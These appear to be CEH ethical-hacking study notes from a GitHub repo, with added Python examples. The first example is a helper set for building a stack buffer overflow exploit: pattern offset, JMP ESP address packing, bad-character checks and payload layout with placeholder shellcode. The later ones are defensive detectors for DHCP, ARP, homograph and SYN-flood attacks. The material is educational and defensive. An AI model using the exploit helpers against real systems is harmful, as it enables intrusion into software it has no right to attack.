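Before moving on to Module 07, one added example for the Module 06 buffer scripts above (not code from the CEH-Notes repo). It reimplements the small pieces those scripts depend on so that each step can be checked offline: the cyclic pattern that offset.py sends, the lookup that `msf-pattern_offset` performs on the EIP value 316A4230, the little-endian packing of the JMP ESP address that verify DLL address.py and shellcode.py hard-code, the byte-by-byte comparison that badchars.py leaves to the debugger, and the final payload layout. The "dumped" memory used to demonstrate the bad-character comparison is constructed here, not read from a real target.

```python
"""Helpers for the stack-overflow workflow in Module 06/buffer.

Added example, not part of the CEH-Notes repo. The memory dumps used below are
constructed stand-ins for bytes read back from the debugger at ESP.
"""
import string
import struct


def pattern_create(length):
    """Same sequence as msf-pattern_create: Aa0Aa1...Az9Ba0... Every 3-byte
    triplet is unique, so any 4-byte window occurs exactly once."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    # 26*26*10 triplets = 20280 bytes before the pattern would repeat.
    raise ValueError("pattern longer than 20280 bytes is not unique")


def pattern_offset(eip_value, length=20280):
    """Offset of the EIP value shown by the debugger (e.g. 0x316A4230) inside
    the pattern. The debugger prints the register in human order while memory
    is little-endian, so the value is reversed before searching."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def pack_address(addr):
    """An x86 address as it must appear in the payload: little-endian."""
    return struct.pack("<I", addr)


# Every byte except \x00, as in Buffer Instructions.md and badchars.py.
ALL_CHARS = bytes(range(1, 256))


def find_bad_chars(sent, dumped):
    """Compare the bytes sent with the bytes that landed in memory and return
    the sent bytes at every mismatching position. A byte that is merely
    mangled shows up alone; a byte that truncates the input (e.g. \\x0a for a
    line-based parser) makes every later byte mismatch as well, so remove the
    first reported byte, regenerate, re-send and repeat until the lists agree."""
    return [b for i, b in enumerate(sent) if i >= len(dumped) or dumped[i] != b]


def build_payload(offset, jmp_esp_addr, shellcode, nops=16):
    """padding | return address -> JMP ESP | NOP sled | shellcode (at ESP)."""
    return b"A" * offset + pack_address(jmp_esp_addr) + b"\x90" * nops + shellcode


if __name__ == "__main__":
    print("offset of 0x316A4230:", pattern_offset(0x316A4230))
    print("0x68a98a7b on the wire:", pack_address(0x68a98a7b))
    # Constructed dump: \x0a and \x0d were replaced by \x00 in memory.
    dump = bytearray(ALL_CHARS)
    dump[ALL_CHARS.index(0x0a)] = 0
    dump[ALL_CHARS.index(0x0d)] = 0
    print("bad characters:", [hex(b) for b in find_bad_chars(ALL_CHARS, bytes(dump))])
    payload = build_payload(1052, 0x68a98a7b, b"\xcc" * 4)
    print("payload length:", len(payload))
```

The NOP sled is the one deliberate departure from the repo's shellcode.py, which jumps straight into raw, unencoded shellcode; once `-b "\x00"` forces msfvenom to add a decoder stub, a few NOPs in front of it give the decoder room to run after `JMP ESP`.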
# Botnet Trojans
- A botnet is a large set of compromised systems spread across the world
- Botnets are controlled from a Command and Control (C2) centre
- Used to launch distributed attacks such as DDoS and spamming
# Proxy Server Trojans
- Proxy Server Trojans turn the compromised system into a proxy server
- Attackers use this to hide the actual source of the attack
# Remote Access Trojans (RAT)
- A RAT gives the attacker remote desktop access to the victim's computer
- A RAT includes a back door to maintain access and control over the victim
- The attacker can monitor the user, access information, alter files, etc.

# Trojan Countermeasures
- Avoid clicking on suspicious email attachments
- Monitor network traffic
- Avoid downloads from untrusted sources
- Install and update security software and anti-virus
- Scan removable media before use
- File integrity monitoring
- Configure a host-based firewall
- Intrusion detection/prevention software (IDS/IPS)

# Detection Techniques for Trojans
- Scan for suspicious network activity
- Scan for suspicious ports
- Scan for suspicious files and folders
- Scan for suspicious processes
--------------------------------------------------------------------------------------------------
# Virus and Worms
# Viruses
A virus is a self-replicating program; it produces multiple copies of itself by attaching to another program.
Characteristics of viruses:
- Infecting other files
- Alteration of data
- Corruption
- Encryption
- Self-replication

# Stages of Virus/Worm Life
- Design: develop the virus from scratch or using construction kits
- Replication: after the virus is deployed, it replicates itself
- Launch: a user accidentally launches the infected program
- Detection: the behaviour of the virus is observed and the virus is identified
- Incorporation: anti-virus developers design defensive code (signatures)
- Elimination: users update their anti-virus and the virus is eliminated
--------------------------------------------------------------------------------------------------
# Ransomware Attack
Ransomware restricts access to the system's files and folders by encrypting them; some types lock the whole system as well. The attacker demands a ransom in exchange for the decryption key. Ransomware is commonly delivered by Trojans. Example: **WannaCry**
--------------------------------------------------------------------------------------------------
# Worms
Worms replicate themselves without attaching to another program and spread without human action. A worm can propagate by itself over file transport and across the network it has infected, which a virus cannot do.
# Analysis and Detection Methods
- Scanning: the suspected file is scanned for known signature strings
- Integrity checking: the entire disk is checked for integrity; the integrity checker records a checksum of every file and later reports the files whose checksum has changed
--------------------------------------------------------------------------------------------------
# Good Reads
- Stuxnet --> https://malicious.life/episode/episode-7-stuxnet-part-1/
- Baka Antivirus software --> Malware
- SUNBURST --> backdoor planted in trojanized SolarWinds Orion updates (the SolarWinds supply-chain attack)

--------------------------------------------------------------------------------
/Module 07 - Malware Threats/Virus Programming.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SNGWN/CEH-Notes/b456452938ea58dfaa7cbbfa1cbd33e641374b37/Module 07 - Malware Threats/Virus Programming.pdf

--------------------------------------------------------------------------------
/Module 08 - Sniffing/CEH Module 8 - Sniffing.md:
--------------------------------------------------------------------------------
# Basic
With sniffing you can monitor all sorts of traffic, protected or unprotected.
Sniffing is the process of capturing and monitoring data such as DNS traffic, web traffic and more by enabling promiscuous mode on the network interface.
The attacker can extract information such as usernames and passwords from it.
Anyone on the same LAN segment can sniff the packets.

# Working of Sniffers
To sniff, the attacker first connects to the target network.
Sniffers switch the Network Interface Card (NIC) into promiscuous mode.
Promiscuous mode is an interface mode in which the NIC accepts every frame it sees, not only the frames addressed to its own MAC.
The attacker decodes the captured packets to extract information.
# Switch vs Hub
- A **switch** forwards broadcast and multicast frames to all ports, but forwards unicast frames only to the port where the destination MAC was learned.
- A **hub** repeats every frame to every port.

# Switch Port Analyzer (SPAN) Port
Also called **port mirroring**. It is configured on a network switch to send a copy of the packets seen on one switch port (or an entire VLAN) to a network monitoring connection on another switch port.
--------------------------------------------------------------------------------------------------------------
# Wiretapping
Gaining information by tapping the signal on a wire such as a telephone line or an internet link. Wiretapping is mostly performed by a third party. Wiretapping with legal authorization is called **lawful interception** and is mostly performed by governments or security agencies.

**Active Wiretapping**
Monitoring and recording the information while altering the communication.

**Passive Wiretapping**
Monitoring and recording the information without any alteration of the communication.

**Lawful Interception/Wiretapping**
Wiretapping with legal authorization, which allows law enforcement agencies to tap a user's communications.
--------------------------------------------------------------------------------------------------------------
# MAC Attacks
The **Media Access Control** (MAC) address is the physical address of a device: a 48-bit identifier assigned to a network interface for communication at the data-link layer (layer 2). The first 24 bits are the Organizationally Unique Identifier (OUI) of the vendor; the last 24 bits are assigned by that vendor to the individual interface (the NIC-specific part).

# MAC Flooding
The attacker sends frames with random source MAC addresses (mapped to random IPs) to overflow the storage capacity of the switch's **CAM (Content Addressable Memory)** table.
The CAM table has a fixed size, so once it is full the switch falls back to hub behaviour and floods every frame to every port, which lets the attacker sniff them. Tool: **macof**

# Defending against MAC Attacks
Port security binds the MAC addresses of known devices to the physical ports and defines a violation action (for example shutting the port down) when an unknown MAC, or too many MACs, appears on a port.
--------------------------------------------------------------------------------------------------------------
# DHCP Attacks
# Dynamic Host Configuration Protocol (DHCP)
DHCP allocates IP addresses dynamically, so addresses are assigned automatically and can be reused once hosts no longer need them. The time from discovering the DHCP server until the leased IP address is obtained is sometimes measured as the DHCP **round trip time**.

# IPv4 DHCP process
1. Using a UDP broadcast, the DHCP client sends an initial **DHCP-Discover** packet.
2. The DHCP server replies with a **DHCP-Offer** packet offering configuration parameters.
3. The DHCP client sends a **DHCP-Request** packet to the chosen DHCP server, requesting the offered parameters.
4. Finally, the DHCP server sends a **DHCP-Acknowledgement** packet containing the configuration parameters.

| CLIENT | | DHCP SERVER |
|:----------------------:|:--:|:----------------------:|
| DHCP-Discover | -> | |
| | <- | DHCP-Offer |
| DHCP-Request | -> | |
| | <- | DHCP-Acknowledgement |

- **IPv4 Ports**:
  - UDP port 67 for the server
  - UDP port 68 for the client
-----------------------------------------------
- **IPv6 Ports (DHCPv6)**:
  - UDP port 546 for the client
  - UDP port 547 for the server

# DHCP Starvation Attack
A DHCP starvation attack is a Denial-of-Service attack on a DHCP server. The attacker sends bogus requests with spoofed MAC addresses to lease every IP address in the DHCP address pool.
Once every address is allocated, new clients cannot obtain an IP address and existing clients cannot renew their leases.

# Rogue DHCP Server
The attacker deploys a rogue DHCP server in the network alongside the DHCP starvation attack. While the legitimate DHCP server is starved, clients cannot obtain leases from it, so subsequent DHCP-Discovery (IPv4) and Solicit (IPv6) messages are answered by the rogue server with configuration parameters (default gateway, DNS server) that direct the clients' traffic towards the attacker.
--------------------------------------------------------------------------------------------------------------
# ARP Poisoning
# Address Resolution Protocol (ARP)
The Address Resolution Protocol (ARP) is a communication protocol used to discover the link-layer address, such as a MAC address, associated with a given internet-layer address, typically an IPv4 address.

# ARP Spoofing Attack
The attacker sends forged ARP replies over the Local Area Network (LAN). Hosts that receive them update their ARP caches so that the IP address of a legitimate user or gateway now maps to the attacker's MAC address, and from then on they send their frames to the attacker, who can read or alter them before forwarding. (The switch itself only learns MAC addresses; it is the hosts' ARP caches that are poisoned.)
ARP poisoning is used for:
- Session hijacking
- Denial-of-Service attacks
- Man-in-the-Middle attacks
- Packet sniffing
- Data interception
- VoIP tapping ---> VOICE OVER IP
- Stealing passwords
--------------------------------------------------------
# Spoofing Attacks
# MAC Spoofing/Duplicating
Manipulating the MAC address to impersonate a legitimate user or to launch attacks such as DoS.
The attacker sniffs the MAC addresses of users active on the switch ports and duplicates one of them.
This can intercept traffic: frames destined for the legitimate user may be delivered to the attacker instead.
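The DHCP and ARP attacks above all leave a footprint that a monitoring host on a SPAN port can see: a burst of DHCP-Discover messages from many different client MACs (starvation), a DHCP-Offer from a server that is not on the inventory (rogue server), and one IP address being claimed by two different MACs in ARP replies (poisoning). The following detector is an added example for these notes, not a tool from the CEH material; the packet-record format (one dict per decoded frame), the sample traffic and the allowlist of DHCP servers are all constructed assumptions.

```python
"""Detect DHCP starvation, a rogue DHCP server and ARP poisoning from decoded
packet records. Added example for these notes, not from the CEH material.
The record format, the allowlist and the sample traffic are assumptions."""

# Constructed sample records, not a real capture.
SAMPLE_PACKETS = [
    # Legitimate exchange: one client discovers, the real server (10.0.0.1) offers
    {"proto": "dhcp", "type": "discover", "src_mac": "aa:bb:cc:00:00:01", "t": 0.0},
    {"proto": "dhcp", "type": "offer", "server_ip": "10.0.0.1",
     "src_mac": "de:ad:be:ef:00:01", "t": 0.1},
    # A second OFFER for the same discover, from a server nobody deployed
    {"proto": "dhcp", "type": "offer", "server_ip": "10.0.0.66",
     "src_mac": "66:66:66:66:66:66", "t": 0.2},
    # ARP: the gateway 10.0.0.1 is first seen at its real MAC ...
    {"proto": "arp", "op": "reply", "sender_ip": "10.0.0.1",
     "sender_mac": "de:ad:be:ef:00:01", "t": 1.0},
    # ... and is then claimed by the attacker's MAC (poisoning)
    {"proto": "arp", "op": "reply", "sender_ip": "10.0.0.1",
     "sender_mac": "66:66:66:66:66:66", "t": 1.5},
]
# Starvation pattern: 60 DISCOVERs from 60 different spoofed MACs in about two seconds
SAMPLE_PACKETS += [
    {"proto": "dhcp", "type": "discover",
     "src_mac": f"02:00:00:00:{i // 256:02x}:{i % 256:02x}", "t": 2.0 + i * 0.03}
    for i in range(60)
]

KNOWN_DHCP_SERVERS = {"10.0.0.1"}   # assumed allowlist taken from the network inventory
STARVE_WINDOW_S = 5.0               # sliding window for counting DISCOVER sources
STARVE_THRESHOLD = 20               # distinct client MACs per window that is abnormal here


def detect(packets, known_servers=KNOWN_DHCP_SERVERS,
           window=STARVE_WINDOW_S, threshold=STARVE_THRESHOLD):
    """Return a list of alert tuples; the first element names the alert type."""
    alerts = []
    arp_table = {}          # ip -> MAC first seen claiming that IP
    discovers = []          # (time, client MAC) still inside the sliding window
    starving = False        # so the starvation alert fires once per episode

    for p in sorted(packets, key=lambda x: x["t"]):
        if p["proto"] == "dhcp" and p["type"] == "offer":
            # Any OFFER from a server that is not in the allowlist is a rogue server
            if p["server_ip"] not in known_servers:
                alerts.append(("rogue_dhcp", p["server_ip"], p["src_mac"]))
        elif p["proto"] == "dhcp" and p["type"] == "discover":
            discovers.append((p["t"], p["src_mac"]))
            discovers = [(t, m) for t, m in discovers if p["t"] - t <= window]
            distinct = len({m for _, m in discovers})
            if distinct >= threshold and not starving:
                alerts.append(("dhcp_starvation", distinct, p["t"]))
            starving = distinct >= threshold
        elif p["proto"] == "arp" and p["op"] == "reply":
            ip, mac = p["sender_ip"], p["sender_mac"]
            first = arp_table.setdefault(ip, mac)
            if first != mac:
                # The same IP is now answered by a different MAC: ARP poisoning
                alerts.append(("arp_poison", ip, first, mac))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_PACKETS):
        print(alert)
```

Run on the sample traffic it reports one rogue-server alert, one ARP-poisoning alert and one starvation alert. In a real deployment the thresholds would be tuned to the segment (a lab VLAN with 200 hosts booting at once legitimately produces many DISCOVERs), and the ARP check should also learn the static gateway mapping so the first-seen MAC cannot itself be the attacker's.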
91 | 92 | # DNS Poisoning ---> WEB CACHE Poisoning 93 | 94 | # Domain Name System (DNS) 95 | - DNS is used in networking to translate human-readable domain names to IP address. 96 | - When DNS Server receives the request, it doesn't have the entry, it generates the query to another DNS Server for the translation and so on. 97 | - DNS server having the translation will send back the IP address. 98 | 99 | # DNS Cache Poisoning 100 | Attacker exploiting flaws in DNS software, adds or alter the entries. 101 | 102 | ------------------------------------------------------------------------------------------------------------ 103 | ------------------------------------------------------------------------------------------------------------ 104 | # Wireshark 105 | Filters in Wireshark: 106 | - `==` Equal 107 | - `eq` Equal 108 | - `!=` Not equal 109 | - `ne` Not equal 110 | - `contains` Contains specified value 111 | - ip.src source addresses 112 | - ip.dst destin addresses 113 | - ip.addr Match at both the places (source and destin) 114 | -------------------------------------------------------------------------------------------------------------- 115 | # Sniffing Countermeasures 116 | - Use Secure Protocol instead of base Protocols (HTTPS over HTTP, SFTP over FTP, etc) 117 | - Switch instead of Hub (Hub broadcast packet by default, but Switch does not) 118 | - Strong encryption protocol (Strong Encrypted data is secure to transmit over any type of network) 119 | -------------------------------------------------------------------------------- /Module 09 - Social Engineering/09_Social_Engineering.md: -------------------------------------------------------------------------------- 1 | # Basic 2 | **Social engineering is an act of stealing information from humans. 
Its a mind manipulation technique.** 3 | - No interaction with target system or network 4 | - Non-technical attack 5 | - Convincing the target to reveal information 6 | - One of the major vulnerability which leads to this type of attack is **Trust**. 7 | - User trust in another user and does not secure their credentials from them. 8 | - Employees are uneducated at organizations, so this is a major vulnerability. 9 | - Lack of security policies and privacy are also vulnerable. 10 | 11 | # Phases in Social Engineering 12 | **Research** 13 | - Collection of information from the target organization 14 | - Collected by dumpster diving, scanning, search on the internet, ... 15 | **Select target** 16 | - Select the target among other employees 17 | - A frustrated target is more preferred 18 | **Relationship** 19 | - Create relationship with the target 20 | - Earn the trust 21 | **Exploit** 22 | - Collecting sensitive information such as usernames, password, etc... 23 | 24 | # Types of Social Engineering - SE Attacks 25 | **Human-based Social Engineering - SE** 26 | One-to-one interaction with the target. Earn the trust to gather sensitive information from the target. 27 | ***Impersonation*** 28 | - Pretend to be something or someone, pretending to be a legitimate user or authorized person. 29 | - Impersonation is performed by identity theft. 30 | ***Eavesdropping and Shoulder Surfing*** 31 | - Eavesdropping is a technique in which attacker is revealed information by listening to the conversation. 32 | - Reading or accessing any source of information without being notified. 33 | - Shoulder Surfing is a method of gathering information by standing behind the target. 34 | ***Dumpster Diving*** ---> 35 | - Looking for treasure in trash. 36 | ***Piggybacking and Tailgating*** 37 | - Piggyback is a technique in which attacker waits for an authorized person to gain entry in a restricted area. 
- Tailgating is a technique in which the attacker gains access to a restricted area by following an authorized person through the entrance.

**Computer-based Social Engineering**
***Phishing***
The attacker sends fake emails that look like legitimate ones to hundreds, sometimes thousands, of recipients. When a recipient opens the link, they are enticed into providing information. Attackers also use the IDN homograph attack (Internationalized Domain Names): they register a domain name written with Cyrillic (or other non-Latin) characters that look identical to Latin letters and host a fake website resembling the real one there.
***Spear Phishing*** --->
Similar to phishing, but focused on one target or organization; because the message is tailored, it generates a higher response rate.

**Mobile-based Social Engineering**
***Publishing Malicious Apps***
These applications are normally a replica or close copy of a popular application.
***Repackaging Legitimate Apps***
Repacking a legitimate app together with malware.

**Insider Attack** --->
Social engineering is not only about a third person gathering information; the attacker may be an insider with privileges.

**Impersonation on Social Network Sites**
***Social Engineering Through Impersonation on Social Network Sites***
The attacker gathers personal information about a target from different sources, mostly social network sites: full name, date of birth, email address, residential address, etc.
After gathering the information, the attacker creates an account that looks exactly like the target's. The attacker then connects with the target's friends and joins the groups the target belongs to, in order to receive updates or convince the target's friends to reveal information.
***Risks of Social Networks in Corporate Networks***
Social network sites do not secure authentication as strictly as a corporate network does.
The major risk of social networks is their weak authentication.
Employees communicating on social networks may not take care of sensitive information.
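The IDN homograph trick mentioned under Phishing is easy to check for mechanically: the browser resolves the punycode (`xn--`) form of each label, and a label that mixes scripts, or is spelled entirely in Cyrillic letters that look like Latin ones, is almost never a legitimate brand domain. The checker below is an added example for these notes, not from the CEH material; its confusables table is a small hand-picked subset of the Unicode confusables data covering common Cyrillic look-alikes, and the sample hostnames are constructed.

```python
"""Flag IDN homograph domains: labels mixing scripts, or labels made of non-Latin
letters that imitate Latin ones. Added example for these notes, not from the
CEH material; the confusables table is an assumed subset, not a complete list."""
import unicodedata

# Cyrillic letters that render like Latin letters in most fonts (subset, assumption).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u04cf": "l",  # palochka, used in the well-known fake "apple.com" demo
}


def scripts_of(label):
    """Scripts used in a label, taken from the Unicode character names
    ('CYRILLIC SMALL LETTER A' -> 'CYRILLIC'). Digits and '-' count as COMMON."""
    scripts = set()
    for ch in label:
        if ch.isascii():
            scripts.add("LATIN" if ch.isalpha() else "COMMON")
        else:
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts


def to_punycode(label):
    """The ASCII-compatible form the resolver actually looks up (xn-- prefix)."""
    if label.isascii():
        return label
    return "xn--" + label.encode("punycode").decode("ascii")


def skeleton(label):
    """Replace known confusables with the Latin letter they imitate."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in label)


def analyze(hostname):
    """Return (label, punycode, reason) for every suspicious label in hostname."""
    findings = []
    for label in hostname.lower().split("."):
        scripts = scripts_of(label) - {"COMMON"}
        if len(scripts) > 1:
            findings.append((label, to_punycode(label),
                             "mixed scripts: " + ", ".join(sorted(scripts))))
        elif not label.isascii() and skeleton(label).isascii():
            findings.append((label, to_punycode(label),
                             f"looks like '{skeleton(label)}'"))
    return findings


if __name__ == "__main__":
    # Constructed examples; Cyrillic letters are written as escapes so they are unambiguous.
    for host in ["apple.com",
                 "\u0430\u0440\u0440le.com",                 # Cyrillic a, r, r + Latin l, e
                 "\u0430\u0440\u0440\u04cf\u0435.com"]:      # all Cyrillic, reads "apple"
        print(host, analyze(host))
```

The two suspicious hosts are reported with their `xn--` form, which is what a mail gateway or proxy log will actually contain; matching on that string rather than the rendered Unicode is the practical way to blocklist such domains. Mixed-script labels are rejected outright by many registries today, so the all-Cyrillic skeleton check is the one that still matters.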
63 | 64 | **Identity Theft** 65 | - Stealing the identification information of someone 66 | - Popularly used for frauds 67 | - Prove the fake identity to take advantage of it 68 | 69 | # Countermeasures 70 | **Secure sensitive data** 71 | Store Data at rest in a secure manner (Use Encryption or Salted Hashing). Don't share Sensitive info/Documents with everyone. 72 | **Physical security** 73 | Who has access to Physical records (Data), who has access to sensitive areas (Server room, Admin block, Data Centres), and how you ensure that Physical security. 74 | **Least privileges** 75 | Assign least Privileges to Employees/User. 76 | **Strong policies** 77 | Password Policies, Access Policies, Device Controls, etc. 78 | **Training** 79 | Train your Employees for popular and new S.E Attacks. 80 | **Bio-metric authentication** 81 | Use Biometric authentication for Access and Entry Records. 82 | **Audit** 83 | Regular Internal Audits and External Audits 84 | 85 | # Tools 86 | - BlackEye - https://github.com/x3rz/blackeye 87 | - SET (Social Engineering Toolkit) 88 | -------------------------------------------------------------------------------- /Module 1 :-: Introduction.md: -------------------------------------------------------------------------------- 1 | # K1). Information Security Triangle or CIA Trait and Non-Repudiation 2 | - Confidentiality 3 | - Confidentiality Ensures that Information is only accessible by right person i.e. only Authorized person can see the information. Protection from unauthorized access. Confidentiality is ensured by implementing Authentication Checks (User Name and Password), Captcha (Mitigate Brute-force and prevent from Bots), etc. Confidential info should be stored in private offline storage and keep in a safe place, or encrypt data if possible. 4 | - Popular attacks affecting confidentiality : Data Breaches, Card Skimming, Keylogging, Phishing, Dumpster Diving, etc. 
- Integrity
  - Integrity ensures that information can only be changed by an authorized person and is not tampered with by anyone else, whether at rest or in transit. Integrity is ensured by hashing, salted hashing, MACs (Message Authentication Codes) and digital signatures, i.e. with the help of cryptography. Encryption or encoding on its own does not provide integrity: ciphertext can be modified without detection unless it is also authenticated.
  - Popular attacks affecting integrity: MITM, data/parameter tampering in transit, etc.
- Availability
  - Availability ensures that information is available to the right person at the right time, i.e. whenever the information is requested it should be accessible.
  - Popular attacks affecting availability: DoS, DDoS, etc.
- Non-Repudiation
  - Non-repudiation ensures that Person A or Person B cannot deny an action performed on their side. For example, if Person A sends money to Person B, Person B cannot claim the money was never received, because there is proof (bank statement, balance increase on B's side, deduction on A's side). For electronic messages, digital signatures provide non-repudiation.

- FireEye Data Breach --> https://malicious.life/episode/episode-101/
- Stuxnet --> https://malicious.life/episode/episode-7-stuxnet-part-1/

# K2). Different Hackers
- White Hat/Ethical Hackers --> Bug hunters, penetration testers; hacking under a legal contract.
- Black Hat --> Cyber terrorists, suicide hackers; hacking with bad intentions.
- Grey Hat --> Sometimes work on offence and sometimes on defence.
- Script Kiddies --> New to the field of cyber security; reuse past exploits and pre-developed scripts to perform attacks.
- State Sponsored Hackers --> Hired by a government to obtain other countries' top secrets.

# K3). Types of Penetration Testing
- White Box Testing --> You get complete details about the system from the client, such as network access, login IDs and passwords, etc.
- Black Box Testing --> You have to enumerate as much as possible on your own, with no prior information.
27 | - Grey Box Testing --> You will get only little details like network access. 28 | 29 | # K4). Teams in Penetration Testing 30 | - Red Team --> Perform like an Hacker and try to hack into Computer Systems, physical Security, Network Security, etc 31 | - Blue Team --> Act as a Defender, and implement necessary security checks to ensure System Security. Also react on Red team's Actions/Attacks. Blue team also work as Incident Response team. 32 | 33 | # K5). Few Terms used in Hacking 34 | - Vulnerability - Know Security Flaw which can be used to compromise CIA trait. 35 | - Payload - This is the Malicious Script, used to perform malicious activity. 36 | - Exploit - Exploit is the combination of Vulnerability and Payload. 37 | - Zero Day - These are Vulnerabilities unknown to developer or not previously disclosed in public. 38 | - Deep Web & Dark web: 39 | - Deep Web - is the space where Spiders and Crawlers are not allowed. for example : Facebook.com/abc is accessible to spiders and crawlers but messages sent ABC to XYZ is only accessible or visible to ABC and XYZ. i.e. not visible through public search engines or not visible publicly. 40 | - Dark Web - Dark web is a part of internet which is only accessible through TOR (The Onion Routing) Browser. These sites have special Top level Domain (TLD) Names '.onion'. For Example: 46787sd6fasdf69756g79aas6df96asd.onion, abc.onion --> 41 | 42 | # K6). Information Security Threat Categories : (Optional) 43 | Network Threats: Like 44 | - MITM - Man In The Middle - Hacker sit between client and Source 45 | - DOS - Denial of Service - Sending tons of junk packets to disturb server so that server was not able to respond authentic requests. 
- PASSWORD-BASED ATTACKS - Default passwords, brute force, dictionary attacks
Host Threats: Like
- Unauthorized Access - Gaining access without permission
- Physical Security Threats - Open access, exposed Wi-Fi routers
Operational Security Threats: Like
- Unpatched OS / Insecure OS
- Zero Days

# K8). Phases of Hacking or how to successfully hack into a system
- Reconnaissance
  Passive = Acquiring information without interacting with the target directly (public sources such as search engines, WHOIS, social media).
  Active = Gaining information by engaging the target directly (via calls, emails, the help desk or technical department, or by probing its systems).
- Scanning
  Scan IPs for open ports and possible vulnerabilities such as old OS versions and running services.
- Gaining Access
  The attacker gains access through the vulnerabilities found in the scanning phase (password cracking, insecure authentication, buffer overflow, etc.).
- Maintaining Access
  Maintain access by creating backdoors, installing rootkits, Trojans, etc.
- Clearing Traces/Logs
  Clear footprints such as established connections and activities performed; remove any data that would identify the hacker.

# K9). Some Information Security Standards: how organizations prove their security --> by auditing.
- PCI DSS - Payment Card Industry Data Security Standard --> Defines how payment card information must be stored and which security controls to keep in mind.
- HIPAA - Health Insurance Portability and Accountability Act --> How employee or client health-related information is stored, and the security checks needed to maintain the CIA triad.
- ISO 27000 --> ISO/IEC 27000 is a family of standards defining the information security management requirements and controls to be implemented in organizations.
--------------------------------------------------------------------------------
/Module 10 - DOS and DDOS/10_Denial_of_Services.md:
--------------------------------------------------------------------------------
# Basic
Denial-of-Service is a type of attack in which a service offered by a system or a network is made unavailable. The service may be denied outright, reduced in functionality, or access to it prevented.

# Symptoms of DoS attack:
- Slow performance
- Increase in spam email --> SMTP
- Unavailability of a resource
- Loss of access to a website
- Disconnection of a wireless or wired internet connection
- Denial of access to any internet services

# Distributed Denial of Service (DDoS)
- In DDoS, multiple compromised systems are used to attack a single target.
- The attacker sends many connection requests to the server with forged return addresses, so the server cannot find a user to send the connection approval to.
- The server keeps each half-open connection for a timeout period before closing it.
- The attacker keeps sending requests, leaving a large number of open connections on the server that lead to a denial of service.

# Categories of DoS/DDoS Attacks
**Volumetric Attacks**
Denial of Service performed by sending a very high amount of traffic towards the target.
Volumetric attacks focus on overloading the bandwidth capacity.
**Fragmentation Attacks**
DoS attacks that fragment IP datagrams into many smaller packets.
Reassembly at the destination consumes resources of routers and hosts.
**TCP-State-Exhaustion Attacks**
TCP state-exhaustion attacks target web servers, firewalls, load balancers and other infrastructure components, disrupting connections by exhausting their finite number of concurrent connection-state entries.
The most common state-exhaustion attack is the SYN flood; the ping of death, by contrast, relies on oversized ICMP packets rather than on exhausting connection state.
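State exhaustion is visible on the victim as connections stuck between SYN-ACK and the final ACK, so a defender counts half-open connections per service rather than raw packets per second. The following is an added example for these notes, not from the CEH material: it replays a legitimate handshake and a flood of spoofed SYNs through a small handshake tracker. The event format (`src_ip, src_port, dst_ip, dst_port, flags`, with tcpdump-style flag letters), the sample traffic and the threshold are assumptions; in practice the records would come from a flow exporter or a conntrack snapshot.

```python
"""Count half-open TCP connections per service from handshake-flag records,
the footprint of a SYN flood. Added example for these notes, not from the CEH
material; event format, sample traffic and threshold are assumptions."""
from collections import defaultdict


def half_open_backlog(events, threshold=50):
    """Track each connection's three-way handshake and return (alerts, backlog):
    backlog maps (server_ip, port) -> connections stuck after SYN-ACK;
    alerts is the subset of services at or above the threshold."""
    state = {}   # (client_ip, client_port, server_ip, server_port) -> handshake state
    for src, sport, dst, dport, flags in events:
        fwd = (src, sport, dst, dport)   # this packet read as client -> server
        rev = (dst, dport, src, sport)   # the same connection keyed from the other side
        if flags == "S":                 # client opens
            state[fwd] = "syn"
        elif flags == "SA":              # server answers; the connection is keyed by the client tuple
            if state.get(rev) == "syn":
                state[rev] = "synack"
        elif flags == "A":               # client completes the handshake
            if state.get(fwd) == "synack":
                state[fwd] = "established"
        elif "R" in flags or "F" in flags:   # reset or close frees the slot
            state.pop(fwd, None)
            state.pop(rev, None)

    backlog = defaultdict(int)
    for (_, _, dst, dport), st in state.items():
        if st == "synack":
            backlog[(dst, dport)] += 1
    alerts = {svc: n for svc, n in backlog.items() if n >= threshold}
    return alerts, dict(backlog)


# Constructed sample traffic, not a capture.
SERVER = "10.0.0.5"
LEGIT_EVENTS = [
    ("192.168.1.10", 40000, SERVER, 80, "S"),
    (SERVER, 80, "192.168.1.10", 40000, "SA"),
    ("192.168.1.10", 40000, SERVER, 80, "A"),
]
# 200 SYNs from spoofed sources: the server answers every one, no ACK ever arrives
FLOOD_EVENTS = []
for i in range(200):
    spoofed = f"203.0.113.{i % 254 + 1}"
    FLOOD_EVENTS.append((spoofed, 1024 + i, SERVER, 80, "S"))
    FLOOD_EVENTS.append((SERVER, 80, spoofed, 1024 + i, "SA"))
SAMPLE_EVENTS = LEGIT_EVENTS + FLOOD_EVENTS


if __name__ == "__main__":
    alerts, backlog = half_open_backlog(SAMPLE_EVENTS)
    print("half-open per service:", backlog)
    print("alerts:", alerts)
```

The completed legitimate connection never appears in the backlog; the 200 spoofed ones do, and port 80 on the server crosses the threshold. The same counting is what SYN cookies avoid on the server side: with cookies enabled the server keeps no state until the final ACK arrives, so the backlog this script measures stays at zero even under the flood.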
# DoS/DDoS Attack Techniques
**Bandwidth Attacks - DDoS**
Bandwidth attacks use multiple sources to generate requests that overload the target.
The goal is to consume the bandwidth completely.
Zombie servers or botnets are used to perform this type of attack.
**Service Request Floods**
The attacker floods a web service or server with requests until it is overloaded.
**SYN Attack / Flooding**
The attacker sends a large number of SYN requests to tie up a system.
The victim replies with SYN-ACK and waits for the final ACK, which the attacker never sends.
Each half-open connection occupies a slot in the listen queue, which can stay tied up for about 75 seconds.
**ICMP Flood Attack**
Flooding the target with ICMP Echo Requests without waiting for the responses overwhelms the resources of the network device.
**Ping of Death**
Sends oversized or malformed ICMP packets (a reassembled size above the 65,535-byte IP maximum) that crash or reboot vulnerable network stacks; it is a malformed-packet attack rather than a flood.
**Permanent DoS Attack (PDoS)**
Permanent DoS is focused on hardware sabotage, causing irreversible damage to the hardware (for example by flashing corrupt firmware).
